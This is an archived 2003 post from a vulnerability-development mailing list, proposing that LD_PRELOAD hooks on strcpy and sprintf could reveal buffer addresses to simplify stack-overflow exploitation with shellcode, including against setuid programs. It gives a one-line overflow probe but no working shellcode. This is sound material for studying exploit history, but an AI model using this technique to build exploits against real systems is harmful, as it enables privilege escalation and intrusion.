Vulnerability Development mailing list archives
Automatic discovery of shellcode address
From: steve () uk intasys com
Date: Sat, 22 Mar 2003 00:18:34 +0000
Hi,
I've been playing around with LD_PRELOAD under Linux to modify
some functions commonly susceptible to buffer overflows, strcpy,
sprintf, etc.
During the course of this work I had an interesting idea, and
I thought I'd post it here for comments.
There are many programs which are exploitable via user supplied
variables such as command line arguments, and environmental variables.
When these inputs are not adequately bounds tested they can be
used to subvert control flow.
A common method of exploitation is to run a program with a long
argument, and see if EIP is overtaken, for example:
/usr/bin/foo `perl -e "print 'a' x 1000'`
If this is vulnerable you'd see something like "cannot access memory
at 0x41414141". This indicated that you've managed to overwrite
ESP, with an address you control.
After that it's endgame - it's just a matter of working out where
your shellcode may be placed and the magic offsets to modify to
point to it.
Whilst this isn't terribly difficult it's a time consuming and
fragile process. (Maybe that's just me!)
It occurs to me that if you know where the buffer in memory which
you're overflowing is, (in the case of sprintf, strcpy etc), you
might be able to cheat.
Knowing the direction the stack goes down all you need to do
is overwrite the memory with:
# shellcode
# address of the start of the buffer x 1000
If the start of the buffer being copied to is know then stick the
shellcode there, and afterwards just append that address, so that
all the likely return pointers are left sticking at your shellcode
in a known location.
How do you get the address of the buffer in the first place?
Use LD_PRELOAD to modify 'strcpy', 'sprintf' to display the address
they're writing to. Simple.
(OK LD_PRELOAD doesn't work for setuid binaries, but typically
copying the target to your machine will work, and you're safe as
the displayed addresses won't change).
Does this sound reasonable, or am I imagining things?
I wrote a small textfile on it, available below, (note it's
still work in progress):
http://www.steve.org.uk/Hacks/preload.txt
Steve
---
www.steve.org.uk
Current thread:
- Automatic discovery of shellcode address steve (Mar 23)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Marco Ivaldi (Mar 24)
- Re: Automatic discovery of shellcode address steve (Mar 24)
- Re: Automatic discovery of shellcode address Joel Eriksson (Mar 28)
- RE: Automatic discovery of shellcode address Adam Gilmore (Mar 24)